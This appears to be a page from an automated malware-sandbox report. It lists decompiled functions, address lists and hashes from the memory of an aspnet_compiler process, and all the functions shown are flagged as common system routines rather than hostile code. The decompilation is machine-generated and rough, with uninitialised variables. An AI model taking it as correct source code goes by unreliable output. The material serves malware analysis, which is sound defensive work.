Uniqueness Score: -1.00%

Function 0118FE3F Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E0118FE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x11cd360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E0111FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E010F7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0111B640(E01119AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x0118fe3f
0x0118fe3f
0x0118fe4e
0x0118fe58
0x0118fe5d
0x0118fe5f
0x0118fe6a
0x0118fe72
0x0118fe75
0x0118fe78
0x0118fe83
0x0118fe95
0x0118fe85
0x0118fe8e
0x0118fe8e
0x0118fea0
0x0118fea1
0x0118fea3
0x0118fea8
0x0118febd

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24cacf47b66696e3ce865c8c9c76c5456aa1f44f544443c5432b8ba6259c514b
Instruction ID: 4d7e89cbdcc3f401935571af5f779831a78795126d83e3b6818845f456fd093e
Opcode Fuzzy Hash: 24cacf47b66696e3ce865c8c9c76c5456aa1f44f544443c5432b8ba6259c514b
Instruction Fuzzy Hash: 6A018471A0421DAFDB18EFA9D845FAEBBB8EF54714F004066B900AB281DA749901CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0118FEC0 Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E0118FEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x11cd360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E0111FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E010F7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0111B640(E01119AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x0118fec0
0x0118fec0
0x0118fecf
0x0118fed9
0x0118fede
0x0118fee0
0x0118feeb
0x0118fef3
0x0118fef6
0x0118fef9
0x0118ff04
0x0118ff16
0x0118ff06
0x0118ff0f
0x0118ff0f
0x0118ff21
0x0118ff22
0x0118ff24
0x0118ff29
0x0118ff3e

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d1d287c465175d73dd5e0bda1e00548a5ac11d6997c3c2495f344c8446dc9df
Instruction ID: 014f9c65e63f276da186685aeb97b3908e5ec5fb44f47707ac5ca4629a7fc8fc
Opcode Fuzzy Hash: 4d1d287c465175d73dd5e0bda1e00548a5ac11d6997c3c2495f344c8446dc9df
Instruction Fuzzy Hash: 50018871A00219AFDB18EBA9D845FAEBBB8EF55714F404066B9009B280DA749941C7D5

Uniqueness

Uniqueness Score: -1.00%

Function 011A8A62 Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E011A8A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x11cd360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E010F7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0111B640(E01119AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x011a8a62
0x011a8a71
0x011a8a79
0x011a8a82
0x011a8a85
0x011a8a89
0x011a8a8c
0x011a8a8f
0x011a8a92
0x011a8a95
0x011a8a9f
0x011a8ab1
0x011a8aa1
0x011a8aaa
0x011a8aaa
0x011a8abc
0x011a8abd
0x011a8abf
0x011a8ac4
0x011a8ada

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d63131ef29309df1406a89c6a579d6641859a9908d73ffcf2bb7765f037ba39d
Instruction ID: 008368b32efd5e6c3ec8751d349613f385f8eddecc3fe55c4064f1de5be91e30
Opcode Fuzzy Hash: d63131ef29309df1406a89c6a579d6641859a9908d73ffcf2bb7765f037ba39d
Instruction Fuzzy Hash: 8B011AB5A0021DAFCB04DFA9D9559AEBBB8EF58310F50446AFA04E7341D734A901CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 011A8ED6 Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E011A8ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x11cd360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E010F7D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E0111B640(E01119AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}

0x011a8ed6
0x011a8ee5
0x011a8eed
0x011a8ef0
0x011a8efa
0x011a8f03
0x011a8f0c
0x011a8f15
0x011a8f24
0x011a8f27
0x011a8f31
0x011a8f43
0x011a8f33
0x011a8f3c
0x011a8f3c
0x011a8f4e
0x011a8f4f
0x011a8f51
0x011a8f56
0x011a8f69

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7393e0ca3130f6c727df1dba033fb749029a1047e31ebf8763ce2e932a4d7566
Instruction ID: 7385a2643b01b793049aaf0b91577f41583e8ccf197115b024e6866868bb8281
Opcode Fuzzy Hash: 7393e0ca3130f6c727df1dba033fb749029a1047e31ebf8763ce2e932a4d7566
Instruction Fuzzy Hash: 5B11007190421A9FDB08DFA8D441AADFBF4BB08200F4442BAE518EB782D7349940CB91

Uniqueness

Uniqueness Score: -1.00%

Function 010DDB60 Relevance: .0, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E010DDB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E010DDB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E010DE7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L010DE8B0(__ecx, _t14, 0xfff);
							L010F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}

0x010ddb64
0x010ddb66
0x010ddb6b
0x010ddbaa
0x010ddb71
0x010ddb76
0x010ddb7a
0x010ddba3
0x010ddb7c
0x010ddb87
0x010ddb8b
0x01134fa1
0x01134fb3
0x01134fb8
0x010ddb91
0x010ddb96
0x010ddb98
0x010ddb98
0x010ddb8b
0x010ddb7a
0x010ddb9d
0x010ddba2

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
Instruction ID: f3778df8b320df32374d5e2d1d0b587f016402eadb5dc74a6586d5dc6bbbe2dd
Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
Instruction Fuzzy Hash: 4FF0FC33241723DBD3325AD98890F9BB6959FD1A74F160035F3859B784CA609C028BD1

Uniqueness

Uniqueness Score: -1.00%

Function 010DB1E1 Relevance: .0, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E010DB1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E010F7D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E010F7D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E01157016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}

0x010db1e8
0x010db1ea
0x010db1f3
0x01134a17
0x010db1f9
0x010db1f9
0x010db1f9
0x010db201
0x01134a21
0x01134a2e
0x00000000
0x00000000
0x01134a3b
0x01134a4d
0x01134a3d
0x01134a46
0x01134a46
0x01134a55
0x00000000
0x00000000
0x00000000
0x010db20a
0x010db20a
0x010db20a
0x010db20a

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
Instruction ID: 755b743b561ca5426f93607c249f8fc3f808d5bea8a419fe5f578d620028e36f
Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
Instruction Fuzzy Hash: D501A433200680DBD326A76DC804F697BD9EF92754F0A40A1FA558BAB2D779C801C315

Uniqueness

Uniqueness Score: -1.00%

Function 0116FE87 Relevance: .0, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E0116FE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x11cd360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E010F7D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0111B640(E01119AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x0116fe96
0x0116fe9e
0x0116fea1
0x0116fead
0x0116feb3
0x0116feb9
0x0116fec3
0x0116fed5
0x0116fec5
0x0116fece
0x0116fece
0x0116fee0
0x0116fee1
0x0116fee3
0x0116fee8
0x0116fefb

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 447d373688ad8bf595810e33a203beaf0743306b336815909c3dbbdbf66a03dc
Instruction ID: d0fe548ba30f6bec4c041d82effe20278cac583d3884d6a145117712382ab29a
Opcode Fuzzy Hash: 447d373688ad8bf595810e33a203beaf0743306b336815909c3dbbdbf66a03dc
Instruction Fuzzy Hash: 0E016271A0421DAFCB18DFA8D552A6EBBF4FF18704F144169A514DB382D635D902CB81

Uniqueness

Uniqueness Score: -1.00%

Function 0119131B Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E0119131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x11cd360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E010F7D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0111B640(E01119AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}

0x0119131b
0x0119132a
0x01191330
0x01191336
0x0119133e
0x01191341
0x01191344
0x0119134f
0x01191361
0x01191351
0x0119135a
0x0119135a
0x0119136c
0x0119136d
0x0119136f
0x01191374
0x01191387

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90fec73a2907e4ff8c9611c23cd364eaba931991bc1e953611deb0d4059dc311
Instruction ID: 9802a4a274a6644451968ece596575f79174b0fc96ef164757ed9ba8b9ac3849
Opcode Fuzzy Hash: 90fec73a2907e4ff8c9611c23cd364eaba931991bc1e953611deb0d4059dc311
Instruction Fuzzy Hash: B7018171A0420DAFCB08EFA8D505AAEB7F4FF18300F404069B915EB381E7349A40CB54

Uniqueness

Uniqueness Score: -1.00%

Function 011A8F6A Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E011A8F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x11cd360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E010F7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E0111B640(E01119AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}

0x011a8f6a
0x011a8f79
0x011a8f81
0x011a8f84
0x011a8f8b
0x011a8f91
0x011a8f94
0x011a8f9e
0x011a8fb0
0x011a8fa0
0x011a8fa9
0x011a8fa9
0x011a8fbb
0x011a8fbc
0x011a8fbe
0x011a8fc3
0x011a8fd6

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db0260555da732497481d1b41ee2743319940dd5373ce075827d0eaf590f9fbe
Instruction ID: e1ee1f923c5b1cc4b6b3595c59359cec0e966a782e238d2cac36972a843ddda5
Opcode Fuzzy Hash: db0260555da732497481d1b41ee2743319940dd5373ce075827d0eaf590f9fbe
Instruction Fuzzy Hash: 7B014475A0420DAFDB04EFA8D545AAEBBF4FF18300F504469B915EB380DB34DA00CB95

Uniqueness

Uniqueness Score: -1.00%

Function 01191608 Relevance: .0, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E01191608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t15;
				intOrPtr _t21;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_t26 = __edx;
				_v8 =  *0x11cd360 ^ _t29;
				_v12 = _a4;
				_v20 = __ecx;
				_v16 = __edx;
				_v46 = 0x1024;
				if(E010F7D50() == 0) {
					_t15 = 0x7ffe0380;
				} else {
					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v52);
				_push(0xc);
				_push(0x20402);
				_push( *_t15 & 0x000000ff);
				return E0111B640(E01119AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
			}

0x01191608
0x01191617
0x0119161d
0x01191625
0x01191628
0x0119162b
0x01191636
0x01191648
0x01191638
0x01191641
0x01191641
0x01191653
0x01191654
0x01191656
0x0119165b
0x0119166e

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64cea31a1403c1e1ab3a1581b228a6aad312d3ae056a1a4461a573ee848746d7
Instruction ID: ee589a2de24107b40834993720492fe0ad956f4972b550e8c60a68e99fd331ae
Opcode Fuzzy Hash: 64cea31a1403c1e1ab3a1581b228a6aad312d3ae056a1a4461a573ee848746d7
Instruction Fuzzy Hash: 24F06DB1E04259EFDF18EFA8D405AAEBBF4EF18700F444069A915EB381EA749900CB94

Uniqueness

Uniqueness Score: -1.00%

Function 010FC577 Relevance: .0, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E010FC577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E010FC5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x10b11cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E011A88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}

0x010fc577
0x010fc57d
0x010fc581
0x010fc5b5
0x010fc5b9
0x010fc5ce
0x010fc5ce
0x010fc5ca
0x00000000
0x010fc5ca
0x010fc5c4
0x010fc5c8
0x00000000
0x00000000
0x00000000
0x010fc5ad
0x00000000
0x010fc5af

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3cd377bd8bc2f767dfa00e3ea55b48bb299b9637ab8c14e9fb71d28dc0f21388
Instruction ID: 97266991ab0e8a06fd475133f59f16d2d1bf71d0953528d402d07729a6e261cd
Opcode Fuzzy Hash: 3cd377bd8bc2f767dfa00e3ea55b48bb299b9637ab8c14e9fb71d28dc0f21388
Instruction Fuzzy Hash: 9DF06DB29156A89AF766C668824FF617FD49B85B60F4444AED78687902C6A4DCC0C250

Uniqueness

Uniqueness Score: -1.00%

Function 011A8D34 Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E011A8D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x11cd360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E010F7D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E0111B640(E01119AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}

0x011a8d34
0x011a8d43
0x011a8d4b
0x011a8d4e
0x011a8d52
0x011a8d5c
0x011a8d6e
0x011a8d5e
0x011a8d67
0x011a8d67
0x011a8d79
0x011a8d7a
0x011a8d7c
0x011a8d81
0x011a8d94

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3bb1a4db3df1cac057c79da929902794e24aaaf179c3a203902fea94a34e088
Instruction ID: a0980f40591d6cc0a4110b55d68ab82e731e95600c717946e52c3cb3b00a90ad
Opcode Fuzzy Hash: e3bb1a4db3df1cac057c79da929902794e24aaaf179c3a203902fea94a34e088
Instruction Fuzzy Hash: 89F0B470A0460C9FDB18EFB8D441A6EBBB4EF18304F5080A9E915EB280DB34D900C794

Uniqueness

Uniqueness Score: -1.00%

Function 01192073 Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E01192073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E0118FD22(__ecx);
				_t19 =  *0x11c849c - _t3; // 0x7bc3d7c7
				if(_t19 == 0) {
					__eflags = _t17 -  *0x11c8748; // 0x0
					if(__eflags <= 0) {
						E01191C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x11c8724 & 0x00000004;
							if(( *0x11c8724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x11c8724; // 0x0
					return E01188DF1(__ebx, 0xc0000374, 0x11c5890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}

0x01192076
0x01192078
0x0119207d
0x01192083
0x011920a4
0x011920aa
0x011920ac
0x011920b7
0x011920ba
0x011920bc
0x011920c9
0x011920c9
0x011920d0
0x011920d2
0x00000000
0x011920d2
0x011920be
0x011920c3
0x011920c5
0x011920c7
0x00000000
0x00000000
0x011920c7
0x011920bc
0x011920d4
0x01192085
0x01192085
0x011920a3
0x011920a3

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bba9282b3b07e8617c1f55ecfcef7db46254df3897bb230c614c7b909f7d4306
Instruction ID: 4861b44ef2c7ac465abfa937863bcb901a56db9f87b52b06a0a3b78e58a892e0
Opcode Fuzzy Hash: bba9282b3b07e8617c1f55ecfcef7db46254df3897bb230c614c7b909f7d4306
Instruction Fuzzy Hash: 34F0206A8117C69EDF3EAF2C21403EA3F92D796124B0E0095D4B017209C73488D3CF20

Uniqueness

Uniqueness Score: -1.00%

Function 0111927A Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E0111927A(void* __ecx) {
				signed int _t11;
				void* _t14;

